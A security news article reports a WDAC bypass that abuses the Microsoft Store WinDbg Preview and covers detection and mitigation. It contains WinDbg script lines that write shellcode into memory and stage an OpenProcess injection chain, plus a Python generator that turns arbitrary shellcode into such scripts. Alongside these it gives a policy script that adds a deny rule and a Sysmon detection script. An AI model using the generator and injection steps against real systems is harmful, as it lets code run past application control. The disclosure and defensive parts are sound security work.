
Windows Defender Policies Bypassed via WinDbg Preview from Microsoft Store


A security researcher has documented a sophisticated technique for bypassing Microsoft’s Windows Defender Application Control (WDAC) using WinDbg Preview, exposing a significant security gap in environments where WDAC policies are implemented to prevent unauthorized code execution.

The bypass, discovered in early April 2025, leverages the fact that WinDbgX.exe (the Microsoft Store version of the Windows Debugger) is conspicuously absent from Microsoft’s recommended WDAC blocklist, despite its legacy counterpart windbg.exe being explicitly blocked.

“The oversight allows attackers to abuse a legitimate Microsoft-signed debugging tool to execute arbitrary code in heavily restricted environments,” says the researcher who demonstrated the technique in a locked-down environment where typical living-off-the-land binaries (LOLBINs) were blocked.

The bypass uses nothing more exotic than WinDbg's ordinary debugging primitives: the debugger writes bytes into the debuggee's memory and sets its registers, and the debugger engine applies those register changes through the SetThreadContext() API. Rewriting RIP and the argument registers of a suspended thread is therefore enough to steer a debuggee into code the attacker controls, without launching any unsigned binary.

The attack involves converting shellcode into a WinDbg script (.wds), using commands like the following (the "text" prefix in the original rendering was a code-block label, not part of the script):

* Allocate 0x6B bytes in the debuggee. .dvalloc prints "Allocated NN bytes starting at <addr>";
* /pS 5 skips the first five output tokens so that <addr> is bound to the loop variable
* and copied into the pseudo-register @$t0.
.foreach /pS 5 ( register { .dvalloc 0x6B } ) { r @$t0 = register }
* Write the shellcode one byte at a time: 53 56 57 is push rbx / push rsi / push rdi.
eb @$t0+00 53 ; eb @$t0+01 56 ; eb @$t0+02 57

.dvalloc allocates the buffer inside the debuggee, and each eb command writes one shellcode byte at the corresponding offset, so the payload is loaded byte-by-byte without any file touching disk.
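The conversion above is mechanical, so it generalises to any payload. The following is an added example written for this article, not the researcher's tooling: it emits a .wds script of the same shape for an arbitrary byte string and can parse such a script back to bytes to check the result. The sample shellcode is the three bytes the article quotes and is constructed here.

```python
# Added example (not from the article or the researcher's tooling): generate a WinDbg
# script of the shape quoted above from an arbitrary shellcode buffer.
import re

# Constructed sample: the three bytes the article writes (push rbx / push rsi / push rdi).
SAMPLE_SHELLCODE = bytes.fromhex("535657")


def shellcode_to_wds(shellcode: bytes, reg: str = "@$t0", per_line: int = 8) -> str:
    """Return .wds text that allocates len(shellcode) bytes in the debuggee and fills them.

    .dvalloc prints "Allocated NN bytes starting at <addr>"; .foreach /pS 5 skips the
    first five tokens so only <addr> is bound to the loop variable and copied into `reg`.
    Each byte is then written with eb at its offset, `per_line` writes per script line.
    """
    if not shellcode:
        raise ValueError("shellcode is empty")
    lines = [
        f".foreach /pS 5 ( addr {{ .dvalloc 0x{len(shellcode):X} }} ) {{ r {reg} = addr }}"
    ]
    for start in range(0, len(shellcode), per_line):
        chunk = shellcode[start:start + per_line]
        lines.append(" ; ".join(
            f"eb {reg}+{start + i:02X} {b:02X}" for i, b in enumerate(chunk)))
    return "\n".join(lines) + "\n"


def wds_payload_bytes(script: str) -> bytes:
    """Inverse helper: recover the bytes an eb-based script writes, ordered by offset.

    Handy for diffing a generated or captured .wds against the original shellcode.
    """
    writes = re.findall(r"eb\s+\S+?\+([0-9A-Fa-f]+)\s+([0-9A-Fa-f]{1,2})", script)
    by_offset = {int(off, 16): int(val, 16) for off, val in writes}
    return bytes(by_offset[o] for o in sorted(by_offset))


if __name__ == "__main__":
    print(shellcode_to_wds(SAMPLE_SHELLCODE), end="")
```

Offsets and values are emitted as two-digit hex because WinDbg's default radix is 16; a payload longer than 0xFF bytes simply gets three-digit offsets. Running the generated script still requires a debuggee to allocate in, which is exactly why blocking the debugger, not the script, is the control that matters.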

The researcher then demonstrated process injection with the classic OpenProcess(), VirtualAllocEx(), WriteProcessMemory(), CreateRemoteThread() chain, staging each call by setting the argument registers and pointing RIP at the target function. The OpenProcess() step looks like this (again with the stray "text" label removed):

* Stage OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId) under the x64 calling convention:
* rcx = PROCESS_ALL_ACCESS (0x1F0FFF), rdx = FALSE, r8 = target PID passed as the script's first argument.
* Reserving 0x20 bytes of shadow space and pointing rip at the function makes the debuggee
* execute the call when it resumes; WinDbg applies these register writes via SetThreadContext().
r rcx = 0x001F0FFF
r rdx = 0
r r8 = ${$arg1}
r rsp = rsp - 0x20
r rip = kernel32!OpenProcess

Microsoft pays bug bounties for qualifying WDAC bypasses, so reports of this kind are in scope for its bounty program.

This discovery comes amid increased focus on WDAC policies as a critical defense against malicious code execution and rollback attacks highlighted in recent Microsoft research.

The bypass is particularly concerning as WinDbg Preview can be installed from the Microsoft Store on workstations where WDAC is enforced but the Microsoft Store remains accessible.

Security experts recommend organizations take immediate steps to mitigate this risk.

“Organizations implementing WDAC should include WinDbgX.exe in their block policies and disable Microsoft Store access in high-security environments,” notes security researcher Hamza Zarki, who previously documented multiple applications capable of bypassing WDAC.

Microsoft’s recommended WDAC blocklist already includes numerous debugging tools such as cdb.exe, dbgeng.dll, and the legacy windbg.exe, but it needs updating to cover this new vector; until it does, organizations have to add the rule themselves.
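An added example, not Microsoft's tooling, of what that rule change looks like in a WDAC policy: the script below audits a policy XML for an effective Deny on a file name and adds one in the same form the recommended block rules use, a Deny keyed on FileName with MinimumFileVersion 65535.65535.65535.65535 so every version is caught, referenced from the user-mode signing scenario. The trimmed policy is constructed here; it denies windbg.exe and cdb.exe but not WinDbgX.exe.

```python
# Added example (not Microsoft's tooling): audit a WDAC policy XML for an effective Deny
# rule on a file name and add one, following the pattern of the recommended block rules
# (a Deny with MinimumFileVersion 65535.65535.65535.65535 catches every version).
import xml.etree.ElementTree as ET

NS = "urn:schemas-microsoft-com:sipolicy"
ET.register_namespace("", NS)
BLOCK_ALL_VERSIONS = "65535.65535.65535.65535"
USER_MODE_SCENARIO = "12"  # SigningScenario Value for user-mode code integrity


def q(tag: str) -> str:
    return f"{{{NS}}}{tag}"


# Constructed, trimmed policy: denies the legacy debugger but not WinDbgX.exe.
SAMPLE_POLICY = """<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
  <VersionEx>10.0.0.0</VersionEx>
  <Rules>
    <Rule><Option>Enabled:UMCI</Option></Rule>
  </Rules>
  <EKUs />
  <FileRules>
    <Deny ID="ID_DENY_WINDBG" FriendlyName="windbg.exe" FileName="windbg.exe" MinimumFileVersion="65535.65535.65535.65535" />
    <Deny ID="ID_DENY_CDB" FriendlyName="cdb.exe" FileName="cdb.exe" MinimumFileVersion="65535.65535.65535.65535" />
  </FileRules>
  <Signers />
  <SigningScenarios>
    <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS" FriendlyName="User mode">
      <ProductSigners>
        <FileRulesRef>
          <FileRuleRef RuleID="ID_DENY_WINDBG" />
          <FileRuleRef RuleID="ID_DENY_CDB" />
        </FileRulesRef>
      </ProductSigners>
    </SigningScenario>
  </SigningScenarios>
</SiPolicy>
"""


def denied_filenames(policy_xml: str) -> set:
    """File names (lower-cased) with a Deny rule that a signing scenario actually references.

    A Deny in <FileRules> that no <FileRuleRef> points to is inert, so it is not counted.
    """
    root = ET.fromstring(policy_xml)
    referenced = {ref.get("RuleID") for ref in root.iter(q("FileRuleRef"))}
    return {
        deny.get("FileName").lower()
        for deny in root.iter(q("Deny"))
        if deny.get("FileName") and deny.get("ID") in referenced
    }


def ensure_deny_rule(policy_xml: str, file_name: str, rule_id: str) -> tuple:
    """Return (policy_xml, added); adds a FileName Deny for file_name if none is effective."""
    if file_name.lower() in denied_filenames(policy_xml):
        return policy_xml, False
    root = ET.fromstring(policy_xml)
    file_rules = root.find(q("FileRules"))
    if file_rules is None:
        raise ValueError("policy has no <FileRules> element")
    ET.SubElement(file_rules, q("Deny"), {
        "ID": rule_id, "FriendlyName": file_name, "FileName": file_name,
        "MinimumFileVersion": BLOCK_ALL_VERSIONS,
    })
    scenario = next((s for s in root.iter(q("SigningScenario"))
                     if s.get("Value") == USER_MODE_SCENARIO), None)
    if scenario is None:
        raise ValueError("policy has no user-mode signing scenario")
    signers = scenario.find(q("ProductSigners"))
    if signers is None:
        signers = ET.SubElement(scenario, q("ProductSigners"))
    refs = signers.find(q("FileRulesRef"))
    if refs is None:
        refs = ET.SubElement(signers, q("FileRulesRef"))
    ET.SubElement(refs, q("FileRuleRef"), {"RuleID": rule_id})
    if hasattr(ET, "indent"):  # Python 3.9+
        ET.indent(root, space="  ")
    return ET.tostring(root, encoding="unicode"), True


if __name__ == "__main__":
    patched, added = ensure_deny_rule(SAMPLE_POLICY, "WinDbgX.exe", "ID_DENY_WINDBGX")
    print("added rule" if added else "already denied")
    print(patched)
```

The audit deliberately ignores Deny entries that no FileRuleRef points to, because such a rule is present in the XML but never enforced; that is a common way a "blocked" binary turns out not to be. The resulting XML still has to be converted to binary with ConvertFrom-CIPolicy and deployed, and a FileName rule is only one layer: a signer-based deny of the WinDbg Store package is the stronger companion where the policy supports it.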

For detection, security teams should watch for WinDbgX.exe manipulating other processes' threads. SetThreadContext() itself is not recorded by standard Windows event logging, so in practice the signals are proxies: Sysmon ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8) events with WinDbgX.exe as the source image and a different process as the target, EDR telemetry that does expose thread-context changes, and, in an estate where the Store debugger has no legitimate role, WinDbgX.exe process creation at all.
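As an added example of that logic, not part of the original article, the following runs three simple rules over constructed Sysmon-style event records: WinDbgX.exe starting, WinDbgX.exe creating a remote thread in another process, and WinDbgX.exe opening another process with rights sufficient for injection (PROCESS_VM_WRITE, PROCESS_VM_OPERATION or PROCESS_CREATE_THREAD). The events and the WindowsApps path are constructed for the example; field names follow Sysmon's schema.

```python
# Added example (constructed telemetry, not from the article): flag WinDbgX.exe acting as
# the source of cross-process access or remote-thread creation in Sysmon-style events.
# SetThreadContext() itself is not recorded by standard Windows logging; these are proxies.
import ntpath
from typing import Optional

# Sysmon Event 10 GrantedAccess bits that matter for injection (PROCESS_* access rights).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECTION_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Constructed sample events; the WindowsApps path is a placeholder, not a real package name.
WINDBGX = r"C:\Program Files\WindowsApps\Microsoft.WinDbg_example\WinDbgX.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": WINDBGX, "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 10, "SourceImage": WINDBGX, "TargetImage": r"C:\Windows\System32\notepad.exe",
     "GrantedAccess": "0x1FFFFF"},
    {"EventID": 8, "SourceImage": WINDBGX, "TargetImage": r"C:\Windows\System32\notepad.exe"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    # The debugger touching its own process is normal and must not fire.
    {"EventID": 10, "SourceImage": WINDBGX, "TargetImage": WINDBGX, "GrantedAccess": "0x1FFFFF"},
]


def is_windbgx(image: str) -> bool:
    # ntpath handles Windows separators regardless of the host running the detection.
    return ntpath.basename(image).lower() == "windbgx.exe"


def classify(event: dict) -> Optional[str]:
    """Return a rule tag for a suspicious event, or None."""
    eid = event.get("EventID")
    src, tgt = event.get("SourceImage", ""), event.get("TargetImage", "")
    if eid == 1 and is_windbgx(event.get("Image", "")):
        # In a WDAC-locked estate the Store debugger starting at all is worth a ticket.
        return "windbgx_started"
    if eid == 8 and is_windbgx(src) and not is_windbgx(tgt):
        return "windbgx_remote_thread"
    if eid == 10 and is_windbgx(src) and not is_windbgx(tgt):
        if int(event.get("GrantedAccess", "0"), 16) & INJECTION_RIGHTS:
            return "windbgx_injection_rights_on_target"
    return None


def detect(events) -> list:
    """Return (index, tag) for every event that matches a rule."""
    hits = []
    for i, ev in enumerate(events):
        tag = classify(ev)
        if tag:
            hits.append((i, tag))
    return hits


if __name__ == "__main__":
    for idx, tag in detect(SAMPLE_EVENTS):
        print(idx, tag, SAMPLE_EVENTS[idx])
```

The process-creation rule is noisy on developer workstations and should be scoped to hosts where WDAC is enforced and debugging is not an expected activity; the two cross-process rules are low-noise anywhere, since a debugger normally attaches only to processes a developer chose.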

This discovery highlights the ongoing cat-and-mouse game between security controls and bypass techniques, emphasizing the need for defense-in-depth strategies beyond application control.
